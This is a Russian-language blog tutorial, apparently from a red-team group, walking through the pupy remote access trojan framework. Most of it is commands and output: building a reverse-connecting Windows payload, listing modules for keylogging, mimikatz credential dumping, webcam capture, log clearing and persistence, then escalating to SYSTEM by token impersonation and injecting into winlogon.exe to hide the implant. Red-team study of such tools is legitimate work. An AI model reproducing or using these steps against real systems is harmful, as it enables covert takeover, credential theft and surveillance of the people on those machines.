July 29

pupy - мощный RAT-фреймворк


Pupy - это кроссплатформенный RAT (Remote administrative tool) и пост-эксплуатационный фреймворк с открытым исходным кодом, написанный на Python и C. Он поддерживает множество различных функций постэксплуатации (кейлоггер, дамп паролей, захват экрана и т.п.) и способен создавать пэйлоады для различных платформ, таких как Linux, Windows, Android и MacOS.

Данная статья представлена исключительно в образовательных целях. Red Team сообщество "GISCYBERTEAM" не несёт ответственности за любые последствия ее использования третьими лицами.


Разработчик рекомендует устанавливать docker-версию в ветке unstable. Скачаем образ и запустим, прокинув несколько портов:

docker pull alxchk/pupy:unstable
docker run -d -p 2022:22 -p 8080:8080 -p 8443:8443 -v /tmp/projects:/projects alxchk/pupy:unstable

Скопируем ssh-ключ с хостовой машины в примонтированную папку контейнера и подключаемся:

cp ~/.ssh/ /tmp/projects/keys/authorized_keys
ssh -p 2022 [email protected]

После подключения должны увидеть такое окно:


Слушатель у нас по-умолчанию поднят на порту 8443, можем сгенерировать первый клиент:

# gen -f <format> <launcher> -t <transport> - синтаксис команды
>> gen -f client -O windows -A x64 connect --host -t ssl
[%] Raw user arguments given for generation: ['--host', '', '-t', 'ssl']
[%] Launcher configuration: Host & port for connection back will be set to
[%] Launcher configuration: Transport for connection back will be set to 'ssl'
[+] Generate client: windows/x64

{ Configuration }
KEY            VALUE                             
launcher       connect                           
launcher_args  --host -t ssl  
cid            2631519028                        

[+] Required credentials (found)
[+] OUTPUT_PATH: /projects/default/output/pupyx64.pAkr8_.exe
[+] DEBUG:       False

В нашем примере указан адрес хостовой машины и порт, который мы прокинули при запуске контейнера. После запуска клиента на целевой машине, мы увидим следующее:

Теперь перейдем к модулям, которые можно посмотреть следующей командой:

>> help -M
dnscnc    DNSCNC control
jobs      Manage Jobs
help      Show help
exposed   list exposed objects/methods
python    Start the local python interpreter (for debugging purposes)
sessions  list/interact with established sessions
creds     Credentials manager
tag       Assign tag to current session
exit      Exit Shell
connect   Connect to the bind payload
run       Run a module on one or multiple clients
logging   Show/set log level
config    Work with configuration file
gen       Generate payload
restart   Restart pupysh
listen    start/stop/show current listeners

CATEGORY  NAME               HELP
admin     shares             List Local And Remote Shared Folder And Permission
admin     ls                 List System Files
admin     wmic               Query Wmi Using Wql
admin     psh                Load/Execute Powershell Scripts
admin     ssh                Ssh Client
admin     rfs                Mount Remote Fs As Fuse Fs To Mountpoint
admin     odbc               Query Sql Using Odbc
admin     smb                Copy Files Via Smb Protocol
admin     smbspider          Walk Through A Smb Directory And Recursively Search A String Into Files
admin     shell_exec         Execute Shell Commands On A Remote System
admin     logs               Show Logs (Or Try To Search Something)
admin     alive              Request To Send Keepalive Packets On Rpyc Level
admin     rdesktop           Start A Remote Desktop Session Using A Browser Websocket Client
admin     cp                 Copy File Or Directory
admin     interactive_shell  Open An Interactive Command Shell With A Nice Tty
admin     rwmic              Remote Wmi Query Using Wql
admin     rm                 Remove A File Or A Directory
admin     reg                Search/List/Get/Set/Delete Registry Keys/Values
admin     netstat            List Terminal Sessions
admin     drives             List Valid Drives In The System
admin     become             Become User
admin     sshell             Interactive Ssh Shell
admin     last               List Terminal Sessions
admin     rdp                Enable / Disable Rdp Connection Or Check For Valid Credentials On A Remote Host
admin     w                  List Terminal Sessions
admin     getdomain          Get Primary Domain Controller
admin     cd                 Change Directory
admin     date               Get Current Date
admin     pexec              Execute Shell Commands Non-Interactively On A Remote System In Background Using Popen
admin     ps                 List Processes
admin     zip                Zip / Unzip File Or Directory
admin     mkdir              Create An Empty Directory
admin     psexec             Launch Remote Commands Using Smbexec Or Wmiexec
admin     clear_logs         Clear Event Logs
admin     dns                Retrieve Domain Name From Ip And Vice Versa
admin     netmon             Collect New Ip Endpoints
admin     pyexec             Execute Python Code On A Remote System
admin     beroot             Check For Privilege Escalation Path
admin     cat                Show Contents Of A File
admin     pyshell            Open An Interactive Python Shell On The Remote Client
admin     mv                 Move File Or Directory
admin     display            Set Display Variable
admin     ad                 Dump Information From Active Directory
admin     ip                 List Interfaces
admin     sudo_alias         Write An Alias For Sudo To Retrieve User Password
admin     igd                Upnp Igd Client
admin     stat               Show A Bit More Info About File Path. Acls/Caps/Owner For Now
admin     http               Trivial Get/Post Requests Via Http Protocol
admin     x509               Fetch Certificate From Server
admin     getppid            List Parent Process Information
admin     getpid             List Process Information
admin     services           List Services
admin     getuid             Get Username
admin     pwd                Get Current Working Dir
creds     loot_memory        Crawl Processes Memory And Look For Cleartext Credentials
creds     creddump           Download The Hives From A Remote Windows System And Dump Creds
creds     lazagne            Retrieve Passwords Stored On The Target
creds     mimipy             Run Mimipy To Retrieve Credentials From Memory
creds     memstrings         Dump Printable Strings From Process Memory For Futher Analysis
creds     netcreds           Manage Saved Authentication Information
exploit   mimishell          Execute Mimikatz From Memory (Interactive)
exploit   mimikatz           Execute Mimikatz From Memory (Non-Interactive)
exploit   exploit_suggester  Exploit Suggester
exploit   shellcode_exec     Executes The Supplied Shellcode On A Client
exploit   impersonate        List/Impersonate Process Tokens
exploit   pipecatcher        Collect Security Tokens From Pipe Server (\\.\Pipe\Catcher)
gather    webcamsnap         Take A Webcam Snap :)
gather    keylogger          A Keylogger To Monitor All Keyboards Interaction Including The Clipboard :-)
gather    hashmon            Try To Find Clear Text Passwords In Memory
gather    get_info           Get Some Informations About One Or Multiple Clients
gather    contacts           To Get Contacts
gather    isearch            Use Windows Search Index To Search For Data
gather    search             Walk Through A Directory And Recursively Search A String Into Files
gather    check_vm           Check If Running On Virtual Machine
gather    outlook            Interact With Outlook Session Of The Targeted User
gather    record_mic         Record Sound With The Microphone !
gather    pywerview          Rewriting Of Some Powerview'S Functionalities In Python
gather    apps               To Interact Manage Applications
gather    call               To Get Call Details
gather    gpstracker         To Interact With Gps
gather    mouselogger        Log Mouse Clicks And Take Screenshots Of Areas Around It
gather    powerview          Execute Powerview Commands
gather    get_hwuuid         Try To Get Uuid (Dmi) Or Machine-Id (Dbus/Linux)
gather    usniper            Globally Capture String Or Register During Execution At Specified
gather    cloudinfo          Retrieve Ec2/Digitalocean Metadata
gather    users              Get Interactive Users
gather    screenshot         Take A Screenshot :)
gather    ttyrec             Globally Capture Intput/Output To Tty. Compatible With Kernels
general   echo               Check Egress (Tcp/Udp) Using Remote Echo Server
general   mapped             Create Virtual Mapped Path With Memfd Backed File (If Supported)
general   exit               Exit The Client On The Other Side
general   process_kill       Kill A Process
manage    edit               Edit Remote File Locally (Download->Edit->Upload)
manage    upload             Upload A File/Directory To A Remote System
manage    hide_process       Edit Current Process Argv & Env Not To Look Suspicious
manage    download           Download A File/Directory From A Remote System
manage    getprivs           Manage Current Process Privileges
manage    tasks              Get Info About Registered Background Tasks
manage    memory_exec        Execute A Executable From Memory
manage    lock_screen        Lock The Session
manage    duplicate          Duplicate The Current Pupy Payload By Executing It From Memory
manage    load_package       Load A Python Package Onto A Remote Client. Packages Files Must Be Placed In One Of The Pupy/Packages/<Os>/<Arch>/ Reposi
manage    migrate            Migrate Pupy Into Another Process Using Reflective Dll Injection
manage    write              Write Short String To File
manage    env                List/Get/Set/Unset Client Environment Variables
manage    persistence        Enable / Disable Persistence
network   port_scan          Run A Tcp Port Scan
network   forward            Local/Remote Port Forwarding And Socks Proxy
network   tcpdump            Module To Reproduce Some Of The Classic Tcpdump Tool Functions
privesc   getsystem          Try To Get Nt Authority System Privileges
privesc   bypassuac          Be Carefull, Most Of Bypass Methods Are Detected By Av...
privesc   inveigh            Execute Inveigh Commands
privesc   privesc_checker    Linux Privilege Escalation Scripts
troll     text_to_speach     Use Android Text To Speach To Say Something :)
troll     vibrate            Activate The Phone/Tablet Vibrator :)
troll     msgbox             Pop Up A Custom Message Box

info     get_info
pyexec   pyexec
exec     shell_exec
ps       ps
migrate  migrate
shell    interactive_shell
kill     process_kill
mount    drives
du       download -S

Перед использованием нам необходимо выбрать сессию, с которой мы будем взаимодействовать:

>> sessions
id  user           hostname    platform  release  os_arch  proc_arch  intgty_lvl  address        
1   VMCOBALT\user  vmcobalt..  Windows   10       AMD64    64bit      High  
>> sessions -i 1
[+] Default filter set to 1

Посмотрим текущие привилегии:

>> getprivs
{ Current priviliges }
Privilege                                  Enabled  
SeAssignPrimaryTokenPrivilege              True    
SeShutdownPrivilege                        True    
SeChangeNotifyPrivilege                    True     
SeUndockPrivilege                          True    
SeImpersonatePrivilege                     True     
SeIncreaseWorkingSetPrivilege              True    
SeTimeZonePrivilege                        True    
SeDelegateSessionUserImpersonatePrivilege  True

Мы можем повысить привилегии с помощью Impersonate-токена:

>> run getsystem -m impersonate
[%] The current pupy launcher is using a REVERSE connection (e.g. 'auto_proxy' or 'connect' launcher)
[+] Impersonated, pid=6868. Migrating..
[+] looking for process 6868 architecture ...
[+] process is 32 bits

{ Configuration }
KEY            VALUE                          
launcher       connect                        
launcher_args  -t ssl --host  
cid            2631519028                     

[+] Required credentials (found)
[+] Template: pupyx86.dll
[+] injecting DLL in target process 6868 ...
[+] DLL injected !
[*] Session 2 opened (WORKGROUP\VMCOBALT$) (

Переключаемся на вторую сессию, где у нас есть привилегии системы:

>> sessions -i 2
[+] Default filter set to 2
>> run pexec whoami
[+] Started at 2024-07-15 08:44:14.738843
nt authority\???????
[+] Completed at 2024-07-15 08:44:14.801988

Также мы можем мигрироваться в другой процесс, чтобы “скрыть” наше присутствие в списке процессов. Для начала посмотрим список активных процессов:

>> ps
   0 {System Idle Process} 
   4 {System} 
  92 {Registry} 
 280 C:\Windows\System32\svchost.exe -k netsvcs -p
 336 {smss.exe} 
 352 C:\Windows\System32\svchost.exe -k utcsvc -p
 420 C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
 428 {csrss.exe} 
 500 {wininit.exe} 
 508 {csrss.exe} 
 572 C:\Windows\System32\winlogon.exe
 640 {services.exe} 
 660 C:\Windows\System32\lsass.exe 
 676 C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p
 772 C:\Windows\System32\svchost.exe -k DcomLaunch -p
 796 C:\Windows\System32\fontdrvhost.exe 
 808 C:\Windows\System32\fontdrvhost.exe 
 888 C:\Windows\System32\svchost.exe -k RPCSS -p
 . . .
 6396 C:\Users\user\Desktop\pupy.exe 

Мигрируемся в процесс winlogon.exe:

>> run migrate 572
[+] Migrating to existing windows process identified with the pid 572
[+] looking for process 572 architecture ...
[+] process is 64 bits

{ Configuration }
KEY            VALUE                          
launcher       connect                        
launcher_args  -t ssl --host  
cid            2631519028                     

[+] Required credentials (found)
[+] Template: pupyx64.dll
[+] injecting DLL in target process 572 ...
[+] DLL injected !
[+] waiting for a connection from the DLL ...
[*] Session 3 opened (WORKGROUP\VMCOBALT$) (
>> [+] got a connection from migrated DLL !
[+] migration completed
[*] Session 2 closed

И убиваем процесс pupy.exe следующим образом:

>> run process_kill 6396
[+] Killed: 6396 (sig=9)
[*] Session 1 closed


Сегодня мы рассмотрели небольшую часть функционала RAT-фреймворка под названием pupy. Надеемся, каждый из вас поэкспериментирует с различными модулями и найдет что-то полезное для себя в этом инструментарии.